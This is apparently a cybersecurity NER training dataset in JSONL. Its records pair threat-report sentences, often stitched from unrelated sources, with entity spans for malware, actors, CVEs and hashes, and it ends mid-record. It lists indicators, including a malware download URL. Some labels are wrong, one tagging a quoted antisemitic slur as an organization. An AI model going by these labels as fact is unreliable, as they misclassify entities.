{"text": "] today PHA Family Highlights : Zen and its cousins January 11 , 2019 Google Play Protect detects Potentially Harmful Applications ( PHAs ) which Google Play Protect defines as any mobile app that poses a potential security risk to users or to user data—commonly referred to as \" malware . Since that time , the group attacked companies in California , Utah , Oklahoma , Colorado , Illinois , Missouri , South Carolina , North Carolina , Virginia and Florida . Between November 26, 2015, and December 1, 2015, known and suspected China based APT groups launched several spear phishing attacks targeting Japanese and Taiwanese organizations in the high-tech , government services , media and financial services industries . This activity suggested exploitation of CVE-2021 - 26858 .", "spans": {"MALWARE: Zen": [[32, 35]], "SYSTEM: Google Play Protect": [[70, 89], [146, 165]], "VULNERABILITY: CVE-2021 - 26858": [[763, 779]]}, "info": {"id": "cyberner_stix_train_005128", "source": "cyberner_stix_train"}}
{"text": "For this purpose , these actors often use tools such as Technitium MAC Address Changer . APT35 typically targets U.S. and the Middle Eastern military , diplomatic and government personnel , organizations in the media , energy and defense industrial base ( DIB ) , and engineering , business services and telecommunications sectors .", "spans": {"THREAT_ACTOR: actors": [[25, 31]], "TOOL: Technitium MAC Address Changer": [[56, 86]], "THREAT_ACTOR: APT35": [[89, 94]], "ORGANIZATION: military": [[141, 149]], "ORGANIZATION: diplomatic": [[152, 162]], "ORGANIZATION: government personnel": [[167, 187]], "ORGANIZATION: organizations": [[190, 203]], "ORGANIZATION: media": [[211, 216]], "ORGANIZATION: energy": [[219, 225]], "ORGANIZATION: defense industrial base": [[230, 253]], "ORGANIZATION: DIB": [[256, 259]], "ORGANIZATION: engineering": [[268, 279]], "ORGANIZATION: business services": [[282, 299]], "ORGANIZATION: telecommunications sectors": [[304, 330]]}, "info": {"id": "cyberner_stix_train_005129", "source": "cyberner_stix_train"}}
{"text": "Both groups can set permissions on specific files to Everyone , and work in tandem with the PLATINUM backdoors . WildFire correctly classifies NetTraveler as malicious .", "spans": {"THREAT_ACTOR: groups": [[5, 11]], "TOOL: PLATINUM backdoors": [[92, 110]], "ORGANIZATION: WildFire": [[113, 121]], "MALWARE: NetTraveler": [[143, 154]]}, "info": {"id": "cyberner_stix_train_005130", "source": "cyberner_stix_train"}}
{"text": "The CIA's Mobile Devices Branch (MDB) developed numerous attacks to remotely hack and control popular smart phones . This document , written in Vietnamese , appears to be reviewing and discussing best practices for teaching and researching scientific topics .", "spans": {"THREAT_ACTOR: CIA's": [[4, 9]]}, "info": {"id": "cyberner_stix_train_005131", "source": "cyberner_stix_train"}}
{"text": "The main DLL is called \" Reznov.DLL . China Chopper is a tool that allows attackers to remotely control the target system that needs to be running a web server application before it can be targeted by the tool . We expect APT33 activity will continue to cover a broad scope of targeted entities , and may spread into other regions and sectors as Iranian interests dictate .", "spans": {"MALWARE: China Chopper": [[38, 51]], "THREAT_ACTOR: attackers": [[74, 83]]}, "info": {"id": "cyberner_stix_train_005132", "source": "cyberner_stix_train"}}
{"text": "Here ’ s another example of such an attack hitting Windows users : Going back to the Android Package ( APK ) file was attached to the e-mail , this is pushing an Android application named “ WUC ’ s Conference.apk ” . PROMETHIUM and NEODYMIUM both used an exploit for CVE-2016-4117 , a vulnerability in Adobe Flash Player that , at the time , was both unknown and unpatched . It was during operator X 's network monitoring that the attackers placed Naikon proxies within the countries ' borders , to cloak and support real-time outbound connections and data Exfiltration from high-profile victim organizations .", "spans": {"SYSTEM: Windows": [[51, 58]], "SYSTEM: Android Package": [[85, 100]], "MALWARE: WUC ’ s Conference.apk": [[190, 212]], "THREAT_ACTOR: PROMETHIUM": [[217, 227]], "THREAT_ACTOR: NEODYMIUM": [[232, 241]], "VULNERABILITY: CVE-2016-4117": [[267, 280]], "THREAT_ACTOR: attackers": [[431, 440]], "MALWARE: Naikon proxies": [[448, 462]]}, "info": {"id": "cyberner_stix_train_005133", "source": "cyberner_stix_train"}}
{"text": "According to the security firm , this campaign targeted Indian military officials via spear-phishing emails , distributing spyware to its victims via an Adobe Reader vulnerability . The DLL exploited another previously unknown vulnerability ( designated CVE-2015-2546 ) in the Windows kernel , which enabled it to elevate privileges for the Word executable and subsequently install a backdoor through the application .", "spans": {"ORGANIZATION: security firm": [[17, 30]], "ORGANIZATION: military officials": [[63, 81]], "VULNERABILITY: Adobe Reader vulnerability": [[153, 179]], "MALWARE: DLL": [[186, 189]], "VULNERABILITY: CVE-2015-2546": [[254, 267]], "SYSTEM: Windows": [[277, 284]], "MALWARE: Word": [[341, 345]]}, "info": {"id": "cyberner_stix_train_005134", "source": "cyberner_stix_train"}}
{"text": "China Chopper contains a remote shell (Virtual Terminal) function that has a first suggested command of netstat an|find ESTABLISHED . The CONFUCIUS_B executable is disguised as a PowerPoint presentation , using a Right-To-Left-Override ( RTLO ) trick and a false icon .", "spans": {"MALWARE: China Chopper": [[0, 13]], "FILEPATH: CONFUCIUS_B": [[138, 149]], "TOOL: Right-To-Left-Override": [[213, 235]], "TOOL: RTLO": [[238, 242]]}, "info": {"id": "cyberner_stix_train_005135", "source": "cyberner_stix_train"}}
{"text": "Upon successful exploitation , the attachment will install the trojan known as NetTraveler using a DLL side-loading attack technique . We revealed a Chinese-based adversary we crypt as Anchor Panda , a group with very specific tactics , techniques , and procedures ( TTPs ) and a keen interest in maritime operations and naval and aerospace technology .", "spans": {"MALWARE: attachment": [[35, 45]], "TOOL: NetTraveler": [[79, 90]], "MALWARE: DLL side-loading": [[99, 115]], "THREAT_ACTOR: Anchor Panda": [[185, 197]], "ORGANIZATION: naval": [[321, 326]], "ORGANIZATION: aerospace technology": [[331, 351]]}, "info": {"id": "cyberner_stix_train_005136", "source": "cyberner_stix_train"}}
{"text": "During the trojan registration stage , the trojan exfiltrates private information such as the phone 's model , IMEI , phone number and country . The following archive caught our attention for exploiting a WinRAR unacev2 module vulnerability and for having interesting content . Similarly , APT37 targeting of a company located in Middle East in 2017 is also consistent with North Korean objectives given the entity 's extensive relationships inside North Korea .", "spans": {"MALWARE: archive": [[159, 166]], "VULNERABILITY: vulnerability": [[227, 240]], "THREAT_ACTOR: APT37": [[290, 295]]}, "info": {"id": "cyberner_stix_train_005137", "source": "cyberner_stix_train"}}
{"text": "The method is a well-known trick used by penetration testers that was automated and generalized by FinFisher The procedure starts by enumerating the KnownDlls object directory and then scanning for section objects of the cached system DLLs . COBALT GYPSY has used spearphishing to target telecommunications , government , defense , oil , and financial services organizations based in or affiliated with the MENA region , identifying individual victims through social media sites . We came across multiple variations of this DLL containing different parent process names , possibly targeted specifically to the victim’s environment . then the data decoded with Base64 and sent to C2 server IP using POST request to the subdirectory .", "spans": {"MALWARE: FinFisher": [[99, 108]], "THREAT_ACTOR: COBALT GYPSY": [[242, 254]], "ORGANIZATION: telecommunications": [[288, 306]], "ORGANIZATION: government": [[309, 319]], "ORGANIZATION: defense": [[322, 329]], "ORGANIZATION: oil": [[332, 335]], "ORGANIZATION: financial services organizations": [[342, 374]], "ORGANIZATION: individual victims": [[433, 451]], "ORGANIZATION: social media": [[460, 472]], "TOOL: DLL": [[524, 527]], "SYSTEM: C2 server IP": [[679, 691]], "TOOL: POST request": [[698, 710]]}, "info": {"id": "cyberner_stix_train_005138", "source": "cyberner_stix_train"}}
{"text": "89eecd91dff4bf42bebbf3aa85aa512ddf661d3e9de4c91196c98f4fc325a018 9edee3f3d539e3ade61ac2956a6900d93ba3b535b6a76b3a9ee81e2251e25c61 0e48e5dbc3a60910c1460b382d28e087a580f38f57d3f82d4564309346069bd1 c113cdd2a5e164dcba157fc4e6026495a1cfbcb0b1a8bf3e38e7eddbb316e01f This Naikon report will be complemented by a follow-on report that will examine the Naikon TTP and the incredible volume of attack activity around the South China Sea that has been going on since at least 2010 . Rancor : CC081FFEA6F4769733AF9D0BAE0308CA0AE63667FA225E7965DF0884E96E2D2A . These observations leave open the possibility that COSMICENERGY was developed with malicious intent , and at a minimum that it can be used to support targeted threat activity in the wild .", "spans": {"THREAT_ACTOR: Naikon": [[265, 271], [344, 350]], "THREAT_ACTOR: Rancor": [[472, 478]], "FILEPATH: CC081FFEA6F4769733AF9D0BAE0308CA0AE63667FA225E7965DF0884E96E2D2A": [[481, 545]], "MALWARE: COSMICENERGY": [[599, 611]]}, "info": {"id": "cyberner_stix_train_005139", "source": "cyberner_stix_train"}}
{"text": "Although it 's not pretty simple to hack Android devices and gadgets , sometimes you just get lucky to find a backdoor access . BRONZE UNION has consistently demonstrated the capability to conduct successful large-scale intrusions against high-profile networks and systems . Outlaw : fc57bd66c27066104cd6f8962cd463a5dfc05fa59b76b6958cddd3542dfe6a9a Cryptocurrency miner Coinminer.Linux.MALXMR.SMDSL32 . What prompted the data scientist Bullock to reach out were gobs of anti - Semitic diatribes from Harrison , who had taken to labeling Biderman and others “ greedy Jew bastards . ”", "spans": {"SYSTEM: Android": [[41, 48]], "THREAT_ACTOR: Outlaw": [[275, 281]], "FILEPATH: fc57bd66c27066104cd6f8962cd463a5dfc05fa59b76b6958cddd3542dfe6a9a": [[284, 348]], "TOOL: Cryptocurrency miner": [[349, 369]], "MALWARE: Coinminer.Linux.MALXMR.SMDSL32": [[370, 400]], "ORGANIZATION: Bullock": [[436, 443]], "THREAT_ACTOR: Harrison": [[500, 508]], "ORGANIZATION: Biderman": [[537, 545]], "ORGANIZATION: greedy Jew bastards": [[559, 578]]}, "info": {"id": "cyberner_stix_train_005140", "source": "cyberner_stix_train"}}
{"text": "Wild Neutron 's attack took advantage of a Java zero-day exploit and used hacked forums as watering holes . The attacks discussed in this blog are related to an APT campaign commonly referred to as \" th3bug \" , named for the password the actors often use with their Poison Ivy malware .", "spans": {"THREAT_ACTOR: Wild Neutron": [[0, 12]], "VULNERABILITY: Java zero-day exploit": [[43, 64]], "MALWARE: Poison Ivy malware": [[266, 284]]}, "info": {"id": "cyberner_stix_train_005141", "source": "cyberner_stix_train"}}
{"text": "Distribution Cybercriminals made use of some exceptionally sophisticated methods to infect mobile devices . March by security researchers from Kaspersky Labs . Unlike previous ShadowPad variants documented in our white paper on the arsenal of the Winnti Group , this launcher is not obfuscated using VMProtect . Victims of the campaign , which researchers named Out to Sea PDF , include diplomatic organizations , technology companies , and medical organizations in Israel , Tunisia , and the UAE .", "spans": {"ORGANIZATION: Kaspersky Labs": [[143, 157]], "MALWARE: ShadowPad": [[176, 185]], "THREAT_ACTOR: Winnti Group": [[247, 259]], "TOOL: VMProtect": [[300, 309]], "ORGANIZATION: diplomatic organizations": [[387, 411]], "ORGANIZATION: technology companies": [[414, 434]], "ORGANIZATION: medical organizations": [[441, 462]]}, "info": {"id": "cyberner_stix_train_005142", "source": "cyberner_stix_train"}}
{"text": "We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers . Taking that into account , we classify the Lamberts as the same level of complexity as Regin , ProjectSauron , Equation and Duqu2 , which makes them one of the most sophisticated Cyber Espionage toolkits we have ever analysed .", "spans": {"VULNERABILITY: Carbanak": [[20, 28]], "THREAT_ACTOR: criminals": [[95, 104]], "ORGANIZATION: financial industry": [[145, 163]], "MALWARE: Lamberts": [[242, 250]], "MALWARE: Regin": [[286, 291]], "MALWARE: ProjectSauron": [[294, 307]], "MALWARE: Equation": [[310, 318]], "MALWARE: Duqu2": [[323, 328]]}, "info": {"id": "cyberner_stix_train_005143", "source": "cyberner_stix_train"}}
{"text": "After inspecting the njRAT builder kit it was determined that this individual customized the existing njRAT builder kit to bypass security products .", "spans": {"TOOL: njRAT builder kit": [[21, 38], [102, 119]]}, "info": {"id": "cyberner_stix_train_005144", "source": "cyberner_stix_train"}}
{"text": "That post included download links for a slew of NSA hacking tools and exploits , many of which could be used to break into hardware firewall appliances , and in turn , corporate or government networks . Barium has targeted Microsoft customers both in Virginia , the United States , and around the world .", "spans": {"ORGANIZATION: NSA": [[48, 51]], "THREAT_ACTOR: Barium": [[203, 209]], "ORGANIZATION: Microsoft customers": [[223, 242]]}, "info": {"id": "cyberner_stix_train_005145", "source": "cyberner_stix_train"}}
{"text": "The group is reported to have previously attacked government institutions , parliaments , senates , diplomatic functions , and even Olympic and other sports bodies .", "spans": {}, "info": {"id": "cyberner_stix_train_005146", "source": "cyberner_stix_train"}}
{"text": "405655be03df45881aa88b55603bef1d .", "spans": {"FILEPATH: 405655be03df45881aa88b55603bef1d": [[0, 32]]}, "info": {"id": "cyberner_stix_train_005147", "source": "cyberner_stix_train"}}
{"text": "These emails were designed to trick recipients into supposedly changing their email passwords on a fake webmail domain .", "spans": {"TOOL: emails": [[6, 12]], "TOOL: email": [[78, 83]]}, "info": {"id": "cyberner_stix_train_005148", "source": "cyberner_stix_train"}}
{"text": "SHA256 : 8ab1712ce9ca2d7952ab763d8a4872aa6a278c3f60dc13e0aebe59f50e6e30f6 The TrickMo Factor The TrickBot Trojan was one of the most active banking malware strains in the cybercrime arena in 2019 . Since 2015 , APT38 has attempted to steal hundreds of millions of dollars from financial institutions . Since then we have identified a number of attacks over a two-year period , beginning in April 2014 , which we attribute to Suckfly .", "spans": {"MALWARE: TrickMo": [[78, 85]], "MALWARE: TrickBot Trojan": [[97, 112]], "THREAT_ACTOR: APT38": [[211, 216]], "ORGANIZATION: financial institutions": [[277, 299]]}, "info": {"id": "cyberner_stix_train_005149", "source": "cyberner_stix_train"}}
{"text": "When malicious attachments are used , they may either be designed to exploit a vulnerability in a popular software assumed to be installed on the victim ’s machine , such as Microsoft Word or Adobe Reader , or the attachment itself may have its icon and filename obfuscated in such a way that the file does not appear to be an executable .", "spans": {"ORGANIZATION: Microsoft": [[174, 183]], "TOOL: Word": [[184, 188]], "TOOL: Adobe Reader": [[192, 204]]}, "info": {"id": "cyberner_stix_train_005150", "source": "cyberner_stix_train"}}
{"text": "The Awen webshell deployed in the exploitation of this SharePoint vulnerability had a SHA256 hash of 5d4628d4dd89f31236f8c56686925cbb1a9b4832f81c95a4300e64948afede21 .", "spans": {"TOOL: Awen": [[4, 8]], "TOOL: SharePoint": [[55, 65]], "FILEPATH: 5d4628d4dd89f31236f8c56686925cbb1a9b4832f81c95a4300e64948afede21": [[101, 165]]}, "info": {"id": "cyberner_stix_train_005151", "source": "cyberner_stix_train"}}
{"text": "It is also much harder for network defenders or researchers to track a campaign where the infrastructure is a moving target . We collected two sets of Clayslide samples that appear to be created during the OilRig actor 's development phase of their attack lifecycle . Exploring it , it is possible to see several files inside of it , as well as the 6323 file . However , if the adversary exploits a ZeroDay vulnerability and develops a new virus to infiltrate the system , traditional signaturebased network security tools will fail to defend against the attack .", "spans": {"TOOL: Clayslide samples": [[151, 168]], "THREAT_ACTOR: OilRig actor": [[206, 218]], "FILEPATH: 6323": [[348, 352]], "THREAT_ACTOR: adversary": [[376, 385]], "VULNERABILITY: ZeroDay vulnerability": [[397, 418]], "MALWARE: virus": [[438, 443]], "TOOL: traditional signaturebased network security tools": [[471, 520]]}, "info": {"id": "cyberner_stix_train_005152", "source": "cyberner_stix_train"}}
{"text": "This way , the malware can have its configuration , malicious binaries and file listings updated , but can also download and execute other binaries . One of the top targets is the Japan Pension Service , but the list of targeted industries includes government and government agencies , local governments , public interest groups , universities , banks , financial services , energy and so on .", "spans": {"MALWARE: malware": [[15, 22]], "ORGANIZATION: Pension Service": [[186, 201]], "ORGANIZATION: government": [[249, 259]], "ORGANIZATION: government agencies": [[264, 283]], "ORGANIZATION: local governments": [[286, 303]], "ORGANIZATION: public interest groups": [[306, 328]], "ORGANIZATION: universities": [[331, 343]], "ORGANIZATION: banks": [[346, 351]], "ORGANIZATION: financial services": [[354, 372]], "ORGANIZATION: energy": [[375, 381]]}, "info": {"id": "cyberner_stix_train_005154", "source": "cyberner_stix_train"}}
{"text": "Quasar version 1.3.0.0 changed the encryption key generation , and stopped saving the password in the sample .", "spans": {"MALWARE: Quasar version 1.3.0.0": [[0, 22]]}, "info": {"id": "cyberner_stix_train_005155", "source": "cyberner_stix_train"}}
{"text": "In some instances , the malware may have been present on victims' networks for a significant period .", "spans": {}, "info": {"id": "cyberner_stix_train_005156", "source": "cyberner_stix_train"}}
{"text": "In our case , the administrator phone number belongs to a mobile network in Australia . Over the past year , we've seen the group extensively targeting a wide gamut of entities in various sectors , including Governments , Academy , Crypto-Currency , Telecommunications and the Oil sectors . The data transmitted are XOR encoded . The first 6 Variables numbered lines were nt used anywhere in the code .", "spans": {"THREAT_ACTOR: group": [[124, 129]], "ORGANIZATION: Governments": [[208, 219]], "ORGANIZATION: Academy": [[222, 229]], "ORGANIZATION: Crypto-Currency": [[232, 247]], "ORGANIZATION: Telecommunications": [[250, 268]], "ORGANIZATION: Oil sectors": [[277, 288]]}, "info": {"id": "cyberner_stix_train_005157", "source": "cyberner_stix_train"}}
{"text": "Their software , once surreptitiously installed on a target 's cell phone or computer , can be used to monitor the target 's communications , such as phone calls , text messages , Skype calls , or emails . The first sample being captured was in April 2018 and since that we observed a lot more related ones .", "spans": {}, "info": {"id": "cyberner_stix_train_005158", "source": "cyberner_stix_train"}}
{"text": "July 21 Analysis of the RCSAndroid spying tool revealed that Hacking Team can listen to calls and roots devices to get in . CopyKittens often uses the trial version of Cobalt Strike , a publicly available commercial software for \" Adversary Simulations and Red Team Operations \" . Hex-Rays kernel doesn’t optimize some functions in MMAT_GLBOPT2 if it judges the optimization within the level is not required . To get in , the attacker used spear phishing emails with a self - extracting archive attachment pretending to be a voicemail .", "spans": {"MALWARE: RCSAndroid": [[24, 34]], "THREAT_ACTOR: CopyKittens": [[124, 135]], "TOOL: Cobalt Strike": [[168, 181]], "TOOL: Hex-Rays": [[281, 289]], "TOOL: MMAT_GLBOPT2": [[332, 344]]}, "info": {"id": "cyberner_stix_train_005159", "source": "cyberner_stix_train"}}
{"text": "Of the four , KeyBase stands out due to its rapid rise in popularity , with a peak deployment of 160 samples per month and usage by 46 separate SilverTerrier actors , followed by a fairly rapid decline . The group , believed to be based in China , has also targeted defense contractors , colleges and universities , law firms , and political organizations — including organizations related to Chinese minority ethnic groups .", "spans": {"TOOL: KeyBase": [[14, 21]], "THREAT_ACTOR: SilverTerrier actors": [[144, 164]], "ORGANIZATION: defense contractors": [[266, 285]], "ORGANIZATION: colleges": [[288, 296]], "ORGANIZATION: universities": [[301, 313]], "ORGANIZATION: law firms": [[316, 325]], "ORGANIZATION: political organizations": [[332, 355]], "ORGANIZATION: minority ethnic groups": [[401, 423]]}, "info": {"id": "cyberner_stix_train_005160", "source": "cyberner_stix_train"}}
{"text": "After the VM code has checked again the user environment , it proceeds to extract and execute the final un-obfuscated payload sample directly into winlogon.exe ( alternatively , into explorer.exe ) process . FireEye 's publication of \" Operation Saffron Rose \" report , which described Flying Kitten 's operations against aviation firms , led to the dismantling of Flying Kitten 's infrastructure and the apparent end of its activities . If successful , every time the system loads wininet.dll , the entry point of the subsequently dropped backdoor DLL will be executed before the original wininet entry point . They have employed many unique capabilities , including gaining initial access through a software supply chain vulnerability .", "spans": {"ORGANIZATION: FireEye": [[208, 215]], "THREAT_ACTOR: Flying Kitten": [[286, 299], [365, 378]], "ORGANIZATION: aviation firms": [[322, 336]], "FILEPATH: wininet.dll": [[482, 493]], "TOOL: DLL": [[549, 552]], "THREAT_ACTOR: employed many unique capabilities , including gaining initial access": [[622, 690]], "VULNERABILITY: software supply chain vulnerability": [[701, 736]]}, "info": {"id": "cyberner_stix_train_005161", "source": "cyberner_stix_train"}}
{"text": "CTU researchers conclude that COBALT GYPSY created the persona to gain unauthorized access to targeted computer networks via social engineering . However , Kaspersky Security Network (KSN) records also contain links that victims clicked from the Outlook web client outlook.live.com” as well as attachments arriving through the Outlook desktop application .", "spans": {"ORGANIZATION: CTU": [[0, 3]], "THREAT_ACTOR: COBALT GYPSY": [[30, 42]], "ORGANIZATION: social engineering": [[125, 143]], "ORGANIZATION: Kaspersky": [[156, 165]], "TOOL: Outlook": [[246, 253], [327, 334]], "FILEPATH: outlook.live.com”": [[265, 282]]}, "info": {"id": "cyberner_stix_train_005162", "source": "cyberner_stix_train"}}
{"text": "Iterating once again over the 171 samples and scraping out the HTTP POST requests , I ended up with the below set of domains :", "spans": {}, "info": {"id": "cyberner_stix_train_005163", "source": "cyberner_stix_train"}}
{"text": "First off , the Trojan registers in the administration panel and receives the information it needs to operate from the C & C ( the SMS interception templates and the text that will be displayed on HTML pages ) : Rotexy intercepts all incoming SMSs and processes them according to the templates it received from the C & C . This bait document , or email attachment , appears to be a standard Word document , but is in fact an CVE-2012-0158 exploit , an executable with a double extension , or an executable with an RTLO filename , so it can execute code without the user 's knowledge or consent . We concluded that Lazarus Group was responsible for WannaCry , a destructive attack in May that targeted Microsoft customers .", "spans": {"MALWARE: Rotexy": [[212, 218]], "MALWARE: bait document": [[328, 341]], "MALWARE: Word document": [[391, 404]], "VULNERABILITY: CVE-2012-0158": [[425, 438]], "THREAT_ACTOR: Lazarus Group": [[614, 627]], "MALWARE: WannaCry": [[648, 656]], "ORGANIZATION: Microsoft customers": [[701, 720]]}, "info": {"id": "cyberner_stix_train_005164", "source": "cyberner_stix_train"}}
{"text": "fields [ ] . Bookworm has little malicious functionality built-in , with its only core ability involving stealing keystrokes and clipboard contents . In the past , BlackOasis messages were designed to appear like news articles from 2016 about political relations between Angola and China . During C0018 , the threat actors opened a variety of ports , including ports 28035 , 32467 , 41578 , and 46892 , to establish RDP connections.[9 ]", "spans": {"TOOL: Bookworm": [[13, 21]], "THREAT_ACTOR: BlackOasis": [[164, 174]], "THREAT_ACTOR: threat actors": [[309, 322]]}, "info": {"id": "cyberner_stix_train_005165", "source": "cyberner_stix_train"}}
{"text": "In addition to built-in functionalities , the operators of Careto can upload additional modules which can perform any malicious task . Create a link file in the startup folder for AutoHotkeyU32.exe , allowing the attack to persist even after a system restart .", "spans": {"MALWARE: Careto": [[59, 65]], "FILEPATH: link file": [[144, 153]], "FILEPATH: AutoHotkeyU32.exe": [[180, 197]]}, "info": {"id": "cyberner_stix_train_005166", "source": "cyberner_stix_train"}}
{"text": "Once downloaded and executed , it drops an intermediate payload that further downloads a Pony DLL and Vawtrak executable , which perform data theft and connect to a command and control (C2) server . Turla is a notorious group that has been targeting diplomats .", "spans": {"MALWARE: Pony DLL": [[89, 97]], "MALWARE: Vawtrak": [[102, 109]], "THREAT_ACTOR: Turla": [[199, 204]], "ORGANIZATION: diplomats": [[250, 259]]}, "info": {"id": "cyberner_stix_train_005167", "source": "cyberner_stix_train"}}
{"text": "The Trojan gets the list of bank phone numbers from its C & C server . One big unknown was the infection vector for Turla ( aka Snake or Uroburos ) . Command line shell for remote administration . These groups can steal information and argue that they are practicing free speech , but more often than not , these groups will employ a DDoS Distributed Denial of Service attack to overload a website with too much traffic and cause it to crash .", "spans": {"THREAT_ACTOR: Snake": [[128, 133]], "THREAT_ACTOR: Uroburos": [[137, 145]], "TOOL: Command line shell": [[150, 168]], "THREAT_ACTOR: groups": [[203, 209]]}, "info": {"id": "cyberner_stix_train_005168", "source": "cyberner_stix_train"}}
{"text": "Even such targets however appear to be consistent with the overarching theme , given the drug trade ’s relevance to security policy .", "spans": {}, "info": {"id": "cyberner_stix_train_005169", "source": "cyberner_stix_train"}}
{"text": "Thus , it is not surprising to see them engage in intrusions against the same victim , even when it may be a waste of resources and lead to the discovery and potential compromise of mutual operations .", "spans": {}, "info": {"id": "cyberner_stix_train_005170", "source": "cyberner_stix_train"}}
{"text": "The panels also contain Thai JavaScript comments and the domain names also contain references to Thai food , a tactic commonly employed to entice users to click/visit these C2 panels without much disruption . BARIUM begins its attacks by cultivating relationships with potential victims—particularly those working in Business Development or Human Resources—on various social media platforms . This technique also allows the attackers to cover their tracks , as having the C&C server in the victims ’ corporate networks means very little C&C traffic leaves them . The new campaign , which we call FakeSG , also relies on hacked WordPress websites to display a custom landing page mimicking the victim 's browser .", "spans": {"ORGANIZATION: social media": [[368, 380]], "TOOL: C&C": [[472, 475], [537, 540]], "MALWARE: FakeSG": [[596, 602]], "SYSTEM: hacked WordPress websites": [[620, 645]]}, "info": {"id": "cyberner_stix_train_005171", "source": "cyberner_stix_train"}}
{"text": "In this case , a URL used to download the PowerShell component shared a naming convention found in the IBM report , http://69.87.223.26:8080/eiloShaegae1 and connected to the IP address used by the previous three samples .", "spans": {"TOOL: URL": [[17, 20]], "TOOL: PowerShell": [[42, 52]], "ORGANIZATION: IBM": [[103, 106]], "DOMAIN: http://69.87.223.26:8080/eiloShaegae1": [[116, 153]]}, "info": {"id": "cyberner_stix_train_005172", "source": "cyberner_stix_train"}}
{"text": "In July 2017 , INDRIK SPIDER joined the movement of targeted ransomware with BitPaymer . Silence is a group of Russian-speaking hackers , based on their commands language , the location of infrastructure they used , and the geography of their targets ( Russia , Ukraine , Belarus , Azerbaijan , Poland , and Kazakhstan ) .", "spans": {"TOOL: BitPaymer": [[77, 86]]}, "info": {"id": "cyberner_stix_train_005173", "source": "cyberner_stix_train"}}
{"text": "Sending text “ call on ” will activate the USSD payment confirmation service . We expect APT34 will continue to evolve their malware and tactics as they continue to pursue access to entities in the Middle East region . It is hard for the targets to identify legitimate and malicious traffic to cloud provider infrastructure . Mandiant has observed UNC2970 , APT43 , and UNC4899 all utilize similar infrastructure .", "spans": {"THREAT_ACTOR: APT34": [[89, 94]]}, "info": {"id": "cyberner_stix_train_005174", "source": "cyberner_stix_train"}}
{"text": "OnionDuke first caught our attention because it was being spread via a malicious Tor exit node .", "spans": {"MALWARE: OnionDuke": [[0, 9]], "TOOL: Tor": [[81, 84]]}, "info": {"id": "cyberner_stix_train_005175", "source": "cyberner_stix_train"}}
{"text": "Later stages of the intrusions rely upon Winnti for persistent access .", "spans": {"MALWARE: Winnti": [[41, 47]]}, "info": {"id": "cyberner_stix_train_005176", "source": "cyberner_stix_train"}}
{"text": "Users rarely check the full URL associated with short links , so threat groups can use URL-shortening services to effectively hide malicious URLs .", "spans": {}, "info": {"id": "cyberner_stix_train_005177", "source": "cyberner_stix_train"}}
{"text": "The lure documents analyzed by Cybereason in this attack concentrate on the following themes :", "spans": {"ORGANIZATION: Cybereason": [[31, 41]]}, "info": {"id": "cyberner_stix_train_005178", "source": "cyberner_stix_train"}}
{"text": "What ’ s more interesting , and much less common , is the inclusion of the com.xiaomi.smarthome.receive_alarm intent filter . We suggest that APT41 sought to target in-game currency but found they could not monetize the specific targeted game , so the group resorted to ransomware to attempt to salvage their efforts and profit from the compromise . Finally , the use of recent domestic events and a prominent US military exercise focused on deterring Russian aggression highlight APT28 's ability and interest in exploiting geopolitical events for their operations .", "spans": {"THREAT_ACTOR: APT41": [[142, 147]], "ORGANIZATION: military": [[413, 421]], "THREAT_ACTOR: APT28": [[481, 486]], "ORGANIZATION: geopolitical": [[525, 537]]}, "info": {"id": "cyberner_stix_train_005179", "source": "cyberner_stix_train"}}
{"text": "TrickMo ’ s Persistence Capabilities When it comes to Android-based devices , many applications must find a way to run on the device after a system reboot . The group also uses the SQL injection (SQLi) tools Havij Advanced SQL Injection Tool and SQLi Dumper version 7.0 (Figure 4) to scan for and exploit vulnerabilities in targeted eCommerce sites . In the past , we had primarily associated the OilRig campaign with using the Clayslide documents to deliver as a payload a Trojan we named Helminth ; in this instance , the payload was instead a variant of the ISMDoor Trojan with significant modifications which we are now tracking as ISMAgent .", "spans": {"MALWARE: TrickMo": [[0, 7]], "SYSTEM: Android-based": [[54, 67]], "THREAT_ACTOR: group": [[161, 166]], "TOOL: SQL injection": [[181, 194]], "MALWARE: Clayslide documents": [[428, 447]], "MALWARE: Trojan": [[474, 480]], "MALWARE: Helminth": [[490, 498]], "MALWARE: ISMDoor Trojan": [[561, 575]], "MALWARE: ISMAgent": [[636, 644]]}, "info": {"id": "cyberner_stix_train_005180", "source": "cyberner_stix_train"}}
{"text": "10001580: Init 10001620: InternetExchange 10001650: SendData This external library implements a simple Wininet-based transport for the main module .", "spans": {}, "info": {"id": "cyberner_stix_train_005181", "source": "cyberner_stix_train"}}
{"text": "Figure 6 . ScarCruft has a keen interest in North Korean affairs , attacking those in the business sector who may have any connection to North Korea , as well as diplomatic agencies around the globe . If the victim appears valuable to the attackers , a GRIFFON implant installer is pushed to the victim’s workstation . Cisco Talos researchers recently discovered Greatness , one of the most advanced phishing - as - a - service tools ever seen in the wild .", "spans": {"THREAT_ACTOR: ScarCruft": [[11, 20]], "ORGANIZATION: business sector": [[90, 105]], "ORGANIZATION: diplomatic agencies": [[162, 181]], "MALWARE: GRIFFON": [[253, 260]], "TOOL: installer": [[269, 278]], "ORGANIZATION: Cisco Talos researchers": [[319, 342]], "TOOL: Greatness": [[363, 372]], "THREAT_ACTOR: phishing - as - a - service tools": [[400, 433]]}, "info": {"id": "cyberner_stix_train_005182", "source": "cyberner_stix_train"}}
{"text": "Once executed , the module attempts to get root privileges on the device by exploiting the following vulnerabilities : CVE-2013-2094 CVE-2013-2595 CVE-2013-6282 CVE-2014-3153 ( futex aka TowelRoot ) CVE-2015-3636 Exploitation process After an in-depth look , we found that the exploit payload code shares several similarities with the public project android-rooting-tools . The last process is utilized as part of the loading process for Cotx RAT and involves the legitimate Symantec binary noted above . Turla : Waterbug , WhiteBear , VENOMOUS BEAR , Snake , Krypton .", "spans": {"VULNERABILITY: CVE-2013-2094": [[119, 132]], "VULNERABILITY: CVE-2013-2595": [[133, 146]], "VULNERABILITY: CVE-2013-6282": [[147, 160]], "VULNERABILITY: CVE-2014-3153": [[161, 174]], "VULNERABILITY: futex": [[177, 182]], "VULNERABILITY: TowelRoot": [[187, 196]], "VULNERABILITY: CVE-2015-3636": [[199, 212]], "THREAT_ACTOR: Cotx RAT": [[438, 446]], "ORGANIZATION: Symantec": [[475, 483]], "THREAT_ACTOR: Turla": [[505, 510]], "THREAT_ACTOR: Waterbug": [[513, 521]], "THREAT_ACTOR: WhiteBear": [[524, 533]], "THREAT_ACTOR: VENOMOUS BEAR": [[536, 549]], "THREAT_ACTOR: Snake": [[552, 557]], "THREAT_ACTOR: Krypton": [[560, 